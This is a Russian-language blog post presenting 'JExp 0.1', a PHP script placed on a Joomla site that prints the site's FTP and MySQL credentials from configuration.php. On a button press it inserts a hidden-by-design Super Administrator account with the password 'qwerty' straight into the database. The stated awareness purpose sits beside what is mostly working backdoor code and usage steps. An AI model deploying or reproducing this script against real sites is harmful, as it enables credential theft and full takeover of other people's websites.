Главная > CMS > JExp 0.1 : Joomla – безопасность. Удаленное добаление Super Administrator

JExp 0.1 : Joomla – безопасность. Удаленное добаление Super Administrator

Актуальная версия скрипта: JExp 0.2
Информация исключительно для того, чтобы понимать необходимость защиты сайта от доступа к файловой системе. Скрипт, используя конфигурационный файл joomla, выводит на экран интересующие нас параметры доступа к сайту, а также позволяет удаленно добавить пользователя в группу Super Administrator.

  1. <?php
  2. if ($_SERVER["QUERY_STRING"] == $_SERVER["HTTP_HOST"]) {
  3.    include "configuration.php";
  4.    $exp = new JConfig();
  5.    function PrintParam($arg) {
  6.       global $exp;
  7.       $arg_ans = $exp->$arg;
  8.       print("<b>".$arg.":&nbsp;</b>".$arg_ans."<br/>");
  9.    }
  10.    echo "<h3>ftp confuguration</h3>";
  11.    PrintParam('ftp_host');
  12.    PrintParam('ftp_user');
  13.    PrintParam('ftp_pass');
  14.    echo "<h3>mysql configuration</h3>";
  15.    PrintParam('host');
  16.    PrintParam('user');
  17.    PrintParam('db');
  18.    PrintParam('password');
  19.    PrintParam('dbprefix');
  20.    echo "<form action='' method='post'><input type='submit' value='add superadmin' name='au' /></form>";
  21.    if ($_POST['au'] != null) {
  22.       $connect = mysql_connect($exp->host, $exp->user, $exp->password);
  23.       $db_select = mysql_select_db($exp->db, $connect);
  24.       $new_username = "username02";
  25.       $new_fullname = "UserName";
  26.       $new_pass_hash = "0c351ddbe5c2e39bae0238901468c0b5:B0peDjABSuno3ZBsBVJjVn6V7Y8VETCF";
  27.  
  28.       $add_query = "INSERT INTO jos_users
  29.          (name, username, email, password, usertype, block, sendEmail, gid, registerDate)
  30.          VALUES
  31.          ('".$new_fullname."', '".$new_username."', '".$new_username."@example.com', '".$new_pass_hash."', 'Super Administrator', '0', '1', '25', NOW())";
  32.       $add_action = mysql_query($add_query, $connect);
  33.  
  34.       $jos_core_acl_aro_SQ = "SELECT id FROM jos_users WHERE username='".$new_username."'";
  35.       $jos_core_acl_aro_SA = mysql_query($jos_core_acl_aro_SQ, $connect);
  36.       $jos_core_acl_aro_SR = mysql_fetch_array($jos_core_acl_aro_SA, $connect);
  37.       $jos_core_acl_aro_ID = $jos_core_acl_aro_SR[0];
  38.  
  39.       $jos_core_acl_aro_IQ = "INSERT INTO jos_core_acl_aro (section_value, value, order_value, name, hidden) VALUES
  40.       ('users', '".$jos_core_acl_aro_ID."', '0', '".$new_fullname."', '0')";
  41.       $jos_core_acl_aro_IA = mysql_query($jos_core_acl_aro_IQ, $connect);
  42.  
  43.       $jos_core_acl_groups_aro_map_SQ = "SELECT id FROM jos_core_acl_aro WHERE name='".$new_fullname."'";
  44.       $jos_core_acl_groups_aro_map_SA = mysql_query($jos_core_acl_groups_aro_map_SQ, $connect);
  45.       $jos_core_acl_groups_aro_map_SR = mysql_fetch_array($jos_core_acl_groups_aro_map_SA, $connect);
  46.       $jos_core_acl_groups_aro_map_ID = $jos_core_acl_groups_aro_map_SR[0];
  47.  
  48.  
  49.       $jos_core_acl_groups_aro_map_IQ = "INSERT INTO jos_core_acl_groups_aro_map (group_id, aro_id) VALUES
  50.       ('25', '".$jos_core_acl_groups_aro_map_ID."')";
  51.       $jos_core_acl_groups_aro_map_IA = mysql_query($jos_core_acl_groups_aro_map_IQ, $connect);
  52.  
  53.       echo "added superadmin - ".$new_username.":qwerty";
  54.    }
  55. }
  56. else {
  57.    echo "unauthorized access!";
  58. }
  59. ?>

Использование:
include "configuration.php"; – путь к файлу в зависимости от того, где в файловой системе находится скрипт.
Параметры нового пользователя, а именно логин, полное имя, e-mail и т.д. указываются в тексте скрипта. Там, кажется, все понятно.
Пароль указан в том формате, в котором его хранит Joomla. В примере указан хэш пароля qwerty, изменить его можно уже из админки. Ну или же создать где-нибудь у себя пользователя и скопировать хэш из phpMyAdmin.
В браузере GETом передаем скрипту имя сервера, ну что-то вроде защиты от случайного использования, наверное можно придумать что-то интереснее.

Categories: CMS Tags: ,
  1. Пока что нет комментариев.
Похожие публикации